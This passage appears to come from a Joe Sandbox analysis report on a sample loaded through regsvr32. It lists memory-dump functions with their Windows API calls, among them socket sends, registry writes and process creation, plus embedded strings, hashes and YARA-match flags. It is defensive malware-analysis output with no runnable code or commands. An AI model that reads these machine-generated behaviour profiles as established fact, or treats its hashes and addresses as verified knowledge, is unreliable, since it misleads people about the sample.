Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
String ID:
API String ID: 1701177279-0
Opcode ID: b90c38a7879365d68958e5b8cc995af9841d5b1ff57e083cd5719233021dd6a7
Instruction ID: 2daae4bc94a7dbf00063fcf7b1f46776b718d24dc99e8ab3f9d8159949ad5ae6
Opcode Fuzzy Hash: b90c38a7879365d68958e5b8cc995af9841d5b1ff57e083cd5719233021dd6a7
Instruction Fuzzy Hash: 16517E36340B808AEB64CF26F45439D73A1F788B98F44A125DB4A47F94DF38D5A5C740

Function 02E43F10 Relevance: 12.1, APIs: 8, Instructions: 106timeCOMMON

Download Yara Rule

APIs

CreateWaitableTimerW.KERNEL32 ref: 02E43F72

Part of subcall function 02E41370: free.LIBCMT ref: 02E41390
Part of subcall function 02E41370: malloc.LIBCMT ref: 02E413BC

setsockopt.WS2_32 ref: 02E4400D
setsockopt.WS2_32 ref: 02E44037
ResetEvent.KERNEL32 ref: 02E44085
SetLastError.KERNEL32 ref: 02E440B0
GetLastError.KERNEL32 ref: 02E440C8

Part of subcall function 02E44D20: GetCurrentThreadId.KERNEL32 ref: 02E44D2D

SetLastError.KERNEL32 ref: 02E440DA

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ErrorLast$setsockopt$CreateCurrentEventResetThreadTimerWaitablefreemalloc
String ID:
API String ID: 3356772049-0
Opcode ID: 0c4811832e00cbba20dc30ab256636ffacc8145d99394b55781261f507fde945
Instruction ID: 36a32de0707fc1cda408b70b781ec35b8e1645d5f0991aa2b61d2ea3556d4f32
Opcode Fuzzy Hash: 0c4811832e00cbba20dc30ab256636ffacc8145d99394b55781261f507fde945
Instruction Fuzzy Hash: 5E414872240B809BE7148F26F94839E77A1F748788F148129EB8987B90CF7ED069CB40

Function 02E62834 Relevance: 12.1, APIs: 8, Instructions: 95COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E6284B
_invalid_parameter_noinfo.LIBCMT ref: 02E62856

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: ddf155117954088a0bb4e70bdf1f4365ac3464c973803e0f49b68c972f192fe3
Instruction ID: 08241363766b87708403f13dc74e7fb27635a759a3d8e660c15c3762b444fcf3
Opcode Fuzzy Hash: ddf155117954088a0bb4e70bdf1f4365ac3464c973803e0f49b68c972f192fe3
Instruction Fuzzy Hash: 9B31F4326D464186DB288B39D64C37C37A0F7857ECF24A615DFA987A90CB38C4A2CB40

Function 02E45400 Relevance: 12.1, APIs: 8, Instructions: 82networksleeptimeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 02E45430
timeGetTime.WINMM ref: 02E45456
GetCurrentThreadId.KERNEL32 ref: 02E45479
send.WS2_32 ref: 02E454BC
SetEvent.KERNEL32 ref: 02E454DA
WSACloseEvent.WS2_32 ref: 02E454F0
shutdown.WS2_32 ref: 02E45509
closesocket.WS2_32 ref: 02E45513

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Event$CloseCurrentSleepThreadTimeclosesocketsendshutdowntime
String ID:
API String ID: 929257074-0
Opcode ID: 6c1e56b6404b1df93eb3e627f74c895b445532c7761a8052013e281b186b1800
Instruction ID: cb2e8ee1a2e52301e0abddc820ae6775b232cf1401d40461fcbdb6f7166fc727
Opcode Fuzzy Hash: 6c1e56b6404b1df93eb3e627f74c895b445532c7761a8052013e281b186b1800
Instruction Fuzzy Hash: 8731523265069087D7219F75F44832C7362F794FADF946221EA6B4BA98CF38C885CB50

Function 02E44F40 Relevance: 12.1, APIs: 8, Instructions: 64windowCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 02E44F67
MsgWaitForMultipleObjects.USER32 ref: 02E44F98
PeekMessageW.USER32 ref: 02E44FB4
TranslateMessage.USER32 ref: 02E44FC5
DispatchMessageW.USER32 ref: 02E44FD0
PeekMessageW.USER32 ref: 02E44FEB
SetLastError.KERNEL32 ref: 02E45017
CloseHandle.KERNEL32 ref: 02E4502C

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Message$Peek$CloseDispatchErrorEventHandleLastMultipleObjectsTranslateWait
String ID:
API String ID: 1713936993-0
Opcode ID: d3b14ee8f2ed008a71182c7c102088909806aed2bf3454968681f8c368bda903
Instruction ID: ed324e8ee7ef0e9bd6eb673a7d8d6f93b993e449e31a71bef3b36b98fa85a89d
Opcode Fuzzy Hash: d3b14ee8f2ed008a71182c7c102088909806aed2bf3454968681f8c368bda903
Instruction Fuzzy Hash: 44219036650A8083E7208F35F45CB2D73A1FBA4748F94A625EA5A869B4DF38C449CB10

Function 02E62BD4 Relevance: 12.1, APIs: 8, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

_FF_MSGBANNER.LIBCMT ref: 02E62BFB

Part of subcall function 02E5C13C: _set_error_mode.LIBCMT ref: 02E5C145
Part of subcall function 02E5C13C: _set_error_mode.LIBCMT ref: 02E5C154

Part of subcall function 02E5BEDC: _set_error_mode.LIBCMT ref: 02E5BF21
Part of subcall function 02E5BEDC: _set_error_mode.LIBCMT ref: 02E5BF32
Part of subcall function 02E5BEDC: GetModuleFileNameW.KERNEL32 ref: 02E5BF94

Part of subcall function 02E5BB48: ExitProcess.KERNEL32 ref: 02E5BB57

Part of subcall function 02E5A7E0: malloc.LIBCMT ref: 02E5A80B
Part of subcall function 02E5A7E0: Sleep.KERNEL32 ref: 02E5A81E

_errno.LIBCMT ref: 02E62C3D
_lock.LIBCMT ref: 02E62C51
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 02E62C67
free.LIBCMT ref: 02E62C74
_errno.LIBCMT ref: 02E62C79
LeaveCriticalSection.KERNEL32 ref: 02E62C9C

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
String ID:
API String ID: 113790786-0
Opcode ID: 33667054d2d382180aecc97be551a92e30174e25f3312452b72f7abc52412f6f
Instruction ID: 269f157929cec0e563b38ff43e7640078fd5a873e2e0f214e71520bdeeb19959
Opcode Fuzzy Hash: 33667054d2d382180aecc97be551a92e30174e25f3312452b72f7abc52412f6f
Instruction Fuzzy Hash: A321BE316E569082E625AB60E81C7BA6367FB847C8F44F528EF4A4BB84CF7CC440CB11

Function 02E42360 Relevance: 10.8, APIs: 2, Strings: 5, Instructions: 339COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 02E42576
malloc.LIBCMT ref: 02E4265D

Part of subcall function 02E552C0: _FF_MSGBANNER.LIBCMT ref: 02E552F0
Part of subcall function 02E552C0: HeapAlloc.KERNEL32 ref: 02E55315
Part of subcall function 02E552C0: _callnewh.LIBCMT ref: 02E5532E
Part of subcall function 02E552C0: _errno.LIBCMT ref: 02E55339
Part of subcall function 02E552C0: _errno.LIBCMT ref: 02E55344

Strings

input ack: sn=%lu rtt=%ld rto=%ld, xrefs: 02E425D1
input probe, xrefs: 02E426D5
[RI] %d bytes, xrefs: 02E4239A
input wins: %lu, xrefs: 02E426FE
input psh: sn=%lu ts=%lu, xrefs: 02E4260E

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno$AllocHeap_callnewhfreemalloc
String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
API String ID: 3198430600-868042568
Opcode ID: 750ebd41106a62b2082671337faf29e5c6b948eda958e7ceff3e7b47e59073a6
Instruction ID: ca3110baa64296bb0e29c016fa359eff61f980ea8528a1befcdf4263c985ba5c
Opcode Fuzzy Hash: 750ebd41106a62b2082671337faf29e5c6b948eda958e7ceff3e7b47e59073a6
Instruction Fuzzy Hash: BED19E726446808BDB748F29F45476EBBA1F784B88F14E025EF9A87B58DF38D440CB51

Function 02E655B8 Relevance: 10.8, APIs: 7, Instructions: 305COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 02E6563C
free.LIBCMT ref: 02E65661
free.LIBCMT ref: 02E65A26
free.LIBCMT ref: 02E65A32

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2545b9cca8e253d8dc5762f349c41804750cab19d6113a61705cd40064087c66
Instruction ID: bf23d20878e3b648cdb42b67337d35eed161ceeda5ef66d65dff8a68ccaa2364
Opcode Fuzzy Hash: 2545b9cca8e253d8dc5762f349c41804750cab19d6113a61705cd40064087c66
Instruction Fuzzy Hash: 0BC18132750B5185DB20DFA2E484AEE77A5F789788F809926DE9D83B04FF78C205CB40

Function 02E443D0 Relevance: 10.7, APIs: 7, Instructions: 154threadnetworktimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02E44400
SetWaitableTimer.KERNEL32 ref: 02E44442
WSAWaitForMultipleEvents.WS2_32 ref: 02E444EC
SetLastError.KERNEL32 ref: 02E44597
GetLastError.KERNEL32 ref: 02E4459D
WSAGetLastError.WS2_32 ref: 02E445CA
GetCurrentThreadId.KERNEL32 ref: 02E445FF

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
String ID:
API String ID: 3058130114-0
Opcode ID: beb139878c52618ef897b8691ffbca13a1492810dcd6d59fbe55f6b96b8c9a26
Instruction ID: 23a73aa33078d9b9e0c26e012b24026f0b100396d63e37ff8c629a4a63b5d1c1
Opcode Fuzzy Hash: beb139878c52618ef897b8691ffbca13a1492810dcd6d59fbe55f6b96b8c9a26
Instruction Fuzzy Hash: C3515B72390B8086DB249F35F85476933A5F748B9CF58A626EE5A87BD8DF39C440C710

Function 02E4DC1E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02E55378: malloc.LIBCMT ref: 02E55392

Part of subcall function 02E55378: _callnewh.LIBCMT ref: 02E55386
Part of subcall function 02E55378: std::exception::exception.LIBCMT ref: 02E553FF

RegCreateKeyW.ADVAPI32 ref: 02E4DD64
RegDeleteValueW.ADVAPI32 ref: 02E4DDA8
RegSetValueExW.ADVAPI32 ref: 02E4DDC8
RegCloseKey.ADVAPI32 ref: 02E4DDDF
CloseHandle.KERNEL32 ref: 02E4E673

Strings

Console\1, xrefs: 02E4DD56

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CloseValue$CreateDeleteHandle_callnewhmallocstd::exception::exception
String ID: Console\1
API String ID: 2917754286-1035756066
Opcode ID: 2219b0c576fd3e4d0e08784fb7636a5387038700b04224bb1bd2999f53d07214
Instruction ID: 8c25743eb27473296880fc38b904e16adadc0b2b511c5f8307ad390f7e46a64d
Opcode Fuzzy Hash: 2219b0c576fd3e4d0e08784fb7636a5387038700b04224bb1bd2999f53d07214
Instruction Fuzzy Hash: 0B51A936355B9082DB58DF22F9587AE73A9F789BC4F409129AE4E47B44DF38C150CB05

Function 02E68600 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.LIBCMT ref: 02E6861B

Part of subcall function 02E62988: _errno.LIBCMT ref: 02E62991
Part of subcall function 02E62988: _invalid_parameter_noinfo.LIBCMT ref: 02E6299C

_errno.LIBCMT ref: 02E6862B
_errno.LIBCMT ref: 02E68649
_isatty.LIBCMT ref: 02E686AA
_getbuf.LIBCMT ref: 02E686B6

Strings

, xrefs: 02E68636

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
String ID:
API String ID: 2574049805-3916222277
Opcode ID: e332a1d343aa96d4712a9f575034e96bbd1a86f49911222e96935b0e9a9d528d
Instruction ID: e552a6a6d012f0cfda41639e5e042aad2c84074e1d3c7b993d2be04fc64d1ff8
Opcode Fuzzy Hash: e332a1d343aa96d4712a9f575034e96bbd1a86f49911222e96935b0e9a9d528d
Instruction Fuzzy Hash: 6541F4722C0B0086DB28DF29D48937D7761EB94BECF14E225DA65473D8EB78C455CB80

Function 02E5BCDC Relevance: 10.6, APIs: 7, Instructions: 99COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.LIBCMT ref: 02E5BD05

Part of subcall function 02E62CBC: _amsg_exit.LIBCMT ref: 02E62CE6

DecodePointer.KERNEL32 ref: 02E5BD38
DecodePointer.KERNEL32 ref: 02E5BD56
DecodePointer.KERNEL32 ref: 02E5BD96
DecodePointer.KERNEL32 ref: 02E5BDB0
DecodePointer.KERNEL32 ref: 02E5BDC0
ExitProcess.KERNEL32 ref: 02E5BE4C

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: DecodePointer$ExitProcess_amsg_exit_lock
String ID:
API String ID: 3411037476-0
Opcode ID: 996cd0f5924440a7e34d656a764d071a0c653d38d32bb3c9cf5966984726c4a8
Instruction ID: 60b9d28b66dc62166db10f0731abb013ce668151b0528eee6d1bdfc3d260caf2
Opcode Fuzzy Hash: 996cd0f5924440a7e34d656a764d071a0c653d38d32bb3c9cf5966984726c4a8
Instruction Fuzzy Hash: 893191312A6BA582E610DF11FC48319B2A5F788BDCF14A029EE8E43B68EF78C451C701

Function 02E5708C Relevance: 10.6, APIs: 7, Instructions: 93threadCOMMON

Download Yara Rule

APIs

Part of subcall function 02E5BA94: HeapCreate.KERNEL32 ref: 02E5BAAA
Part of subcall function 02E5BA94: GetVersion.KERNEL32 ref: 02E5BABC
Part of subcall function 02E5BA94: HeapSetInformation.KERNEL32 ref: 02E5BADA

_RTC_Initialize.LIBCMT ref: 02E570BE
GetCommandLineA.KERNEL32 ref: 02E570C3

Part of subcall function 02E623B0: GetEnvironmentStringsW.KERNEL32 ref: 02E623C9
Part of subcall function 02E623B0: WideCharToMultiByte.KERNEL32 ref: 02E62420
Part of subcall function 02E623B0: WideCharToMultiByte.KERNEL32 ref: 02E6245B
Part of subcall function 02E623B0: free.LIBCMT ref: 02E62468
Part of subcall function 02E623B0: FreeEnvironmentStringsW.KERNEL32 ref: 02E62473

Part of subcall function 02E61C70: GetStartupInfoW.KERNEL32 ref: 02E61C91

__setargv.LIBCMT ref: 02E570EC
_cinit.LIBCMT ref: 02E57100

Part of subcall function 02E5DE2C: FlsFree.KERNEL32 ref: 02E5DE3B
Part of subcall function 02E5DE2C: DeleteCriticalSection.KERNEL32 ref: 02E62B67
Part of subcall function 02E5DE2C: free.LIBCMT ref: 02E62B70
Part of subcall function 02E5DE2C: DeleteCriticalSection.KERNEL32 ref: 02E62B97

Part of subcall function 02E61F44: free.LIBCMT ref: 02E61F95

Part of subcall function 02E5A860: Sleep.KERNEL32 ref: 02E5A8A5

FlsSetValue.KERNEL32 ref: 02E5719A
GetCurrentThreadId.KERNEL32 ref: 02E571AE
free.LIBCMT ref: 02E571BD

Part of subcall function 02E55280: HeapFree.KERNEL32 ref: 02E55296
Part of subcall function 02E55280: _errno.LIBCMT ref: 02E552A0
Part of subcall function 02E55280: GetLastError.KERNEL32 ref: 02E552A8

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: free$FreeHeap$ByteCharCriticalDeleteEnvironmentMultiSectionStringsWide$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValueVersion__setargv_cinit_errno
String ID:
API String ID: 125979975-0
Opcode ID: 1b780d2af2d2b08c57e81dbe5f9cf27f7226efad3fa970d95da47f5686e96d3e
Instruction ID: 3ece1ddac19f7580aa174417008d7af2f0b0a53e40c21a592ed8c3bb520f13cf
Opcode Fuzzy Hash: 1b780d2af2d2b08c57e81dbe5f9cf27f7226efad3fa970d95da47f5686e96d3e
Instruction Fuzzy Hash: 983193306F027389EF247B719A0837EA2979F5079DF14F169DD5685288FF38C4618A32

Function 0287E0DC Relevance: 10.6, APIs: 7, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0287E0FF
_errno.LIBCMT ref: 0287E107

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: bc31ac164400ea638efb2a253a4159f9418708a92b737441d98fa66cbbbdf454
Instruction ID: ba1ea0f44914a36267f3a19237b01de3fe19606ade5a4040046e1b23443a11a0
Opcode Fuzzy Hash: bc31ac164400ea638efb2a253a4159f9418708a92b737441d98fa66cbbbdf454
Instruction Fuzzy Hash: 3021373C218B484FE31DAB6CDC867B977C1EB46331F06028DE54AC72E1D664A84186B3

Function 028BE7E9 Relevance: 10.6, APIs: 7, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 028BE80C
_errno.LIBCMT ref: 028BE814

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 3968a178c04b1dda016d64c80a41a5b0c5f70fe22e64b3b5d71b493b2a21061a
Instruction ID: 3e5c592cbe35a9aafb9b3e27a6448827380680b871ecac37e867ed72b457eccd
Opcode Fuzzy Hash: 3968a178c04b1dda016d64c80a41a5b0c5f70fe22e64b3b5d71b493b2a21061a
Instruction Fuzzy Hash: EF21F53C618F084FE71AAB6CD8813F93BD1EF46321F45524DE54AC73A2D76468018AA3

Function 0287E920 Relevance: 10.6, APIs: 7, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0287E943
_errno.LIBCMT ref: 0287E94B

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 1f7af2e854afd7785fd2e0354adf99b5593f1b5f9a5b06e87902d7b45ce64cd3
Instruction ID: 8d652a036b5aefc06df8a935eda727062268645766c380d3dcd0e8f6ca411f26
Opcode Fuzzy Hash: 1f7af2e854afd7785fd2e0354adf99b5593f1b5f9a5b06e87902d7b45ce64cd3
Instruction Fuzzy Hash: 3D210A3DA1C7044EE349BB6CDC867783791EF45326F050299E546C72E2D764A80186A3

Function 02E57DA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E57DC7
_invalid_parameter_noinfo.LIBCMT ref: 02E57DD2
_fileno.LIBCMT ref: 02E57DF5
_errno.LIBCMT ref: 02E57E65
_invalid_parameter_noinfo.LIBCMT ref: 02E57E70

Strings

@, xrefs: 02E57DE8

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$_fileno
String ID: @
API String ID: 3947385824-2766056989
Opcode ID: af564db91ba97d0b77235dee38384f54ac06b36b1a5ed8721de6b5247343fed1
Instruction ID: b7aefa8bfdfaf8c2e23c487f80a0fa9940bc2959f9c5da11963d3042dae8fdad
Opcode Fuzzy Hash: af564db91ba97d0b77235dee38384f54ac06b36b1a5ed8721de6b5247343fed1
Instruction Fuzzy Hash: 62212D722A079141CF199B35DC54338A352AB95FA8FA4F61ADE294B2D4DF38C851C310

Function 02E4FAF0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77processstringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 02E4FB00
GetFileAttributesW.KERNEL32 ref: 02E4FB8A
GetLastError.KERNEL32 ref: 02E4FB95
CreateProcessW.KERNEL32 ref: 02E4FBFA

Strings

h, xrefs: 02E4FBF2
WinSta0\Default, xrefs: 02E4FBB0

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: AttributesCreateErrorFileLastProcesslstrlen
String ID: WinSta0\Default$h
API String ID: 591566999-1620045033
Opcode ID: 32a352b419bde3d174141e61f84ad47ef660ce78bc64c5ffb13d4ce8ad96e1b3
Instruction ID: 7b292be557eea78f451831afb13f6925bd27099f170a74d18bb1e76cc4542bd4
Opcode Fuzzy Hash: 32a352b419bde3d174141e61f84ad47ef660ce78bc64c5ffb13d4ce8ad96e1b3
Instruction Fuzzy Hash: 8A31C53164468186DB60DB25F9143AA73A2F785BD4F449231EE5D87F98EF3CC095CB00

Function 02E57C9C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E57CBC
_invalid_parameter_noinfo.LIBCMT ref: 02E57CC7
_fileno.LIBCMT ref: 02E57CE7
_errno.LIBCMT ref: 02E57D57
_invalid_parameter_noinfo.LIBCMT ref: 02E57D62

Strings

@, xrefs: 02E57CDA

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$_fileno
String ID: @
API String ID: 3947385824-2766056989
Opcode ID: a29fee2f15fe2de611211933ed3ced769d455d1257d9a970644a691804d751dc
Instruction ID: 92b7d0755dd277ff09211baf174781646ff3c2a4b3eac83e159bb70a2c2e871a
Opcode Fuzzy Hash: a29fee2f15fe2de611211933ed3ced769d455d1257d9a970644a691804d751dc
Instruction Fuzzy Hash: B52127622B0A9541CF199B79DC54338A251ABC3BA8F64F612DE2E862E4DF3CC062C310

Function 0287AC9C Relevance: 10.6, APIs: 7, Instructions: 75COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0287ACC0
_errno.LIBCMT ref: 0287ACD9
write_char.LIBCMT ref: 0287ACEE
_errno.LIBCMT ref: 0287ACFB
write_char.LIBCMT ref: 0287AD0D
_errno.LIBCMT ref: 0287AD16
_errno.LIBCMT ref: 0287AD20

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _errno$write_char
String ID:
API String ID: 1772936973-0
Opcode ID: 3092101f4da50db01581974a644fad622e6709ebf2b60c566d43b2d692c17ccd
Instruction ID: 2ed3b981f7e0213de2d121998709ee1d3e1b416e993862f2624dcc9cce8b6956
Opcode Fuzzy Hash: 3092101f4da50db01581974a644fad622e6709ebf2b60c566d43b2d692c17ccd
Instruction Fuzzy Hash: FC11BF3C918B088FDB68AF5C80857283BE0FB99311F1611AAE45DC72A1D774EC81CB93

Function 028BB3A9 Relevance: 10.6, APIs: 7, Instructions: 75COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 028BB3CD
_errno.LIBCMT ref: 028BB3E6
write_char.LIBCMT ref: 028BB3FB
_errno.LIBCMT ref: 028BB408
write_char.LIBCMT ref: 028BB41A
_errno.LIBCMT ref: 028BB423
_errno.LIBCMT ref: 028BB42D

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _errno$write_char
String ID:
API String ID: 1772936973-0
Opcode ID: c71356e80ab61c116f08e0e7252ee1ba80ccbfc151ac000d77de5458481281de
Instruction ID: b2c3e09a89b697643ec993561671d1a0d50174e204bf0e1b9524be4cced89665
Opcode Fuzzy Hash: c71356e80ab61c116f08e0e7252ee1ba80ccbfc151ac000d77de5458481281de
Instruction Fuzzy Hash: 53117C3C518B488FCB62AF5C80413A536E1FF5A315F1595AEDA9DC7361D3709C818B93

Function 02E4A220 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 02E4A274
std::exception::exception.LIBCMT ref: 02E4A2C0
std::exception::exception.LIBCMT ref: 02E4A308

Part of subcall function 02E5733C: RaiseException.KERNEL32 ref: 02E573B7

Strings

ios_base::badbit set, xrefs: 02E4A269
ios_base::failbit set, xrefs: 02E4A2B5
ios_base::eofbit set, xrefs: 02E4A2FD

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: std::exception::exception$ExceptionRaise
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 127205192-1866435925
Opcode ID: d53289f82b987d99488ffd486f5e8e9424002f469d181d04e2350c7ea1fe77c1
Instruction ID: 8257446bdac059f741d03a1679b7a3066592989e10835d73f9ed86ceabce7a61
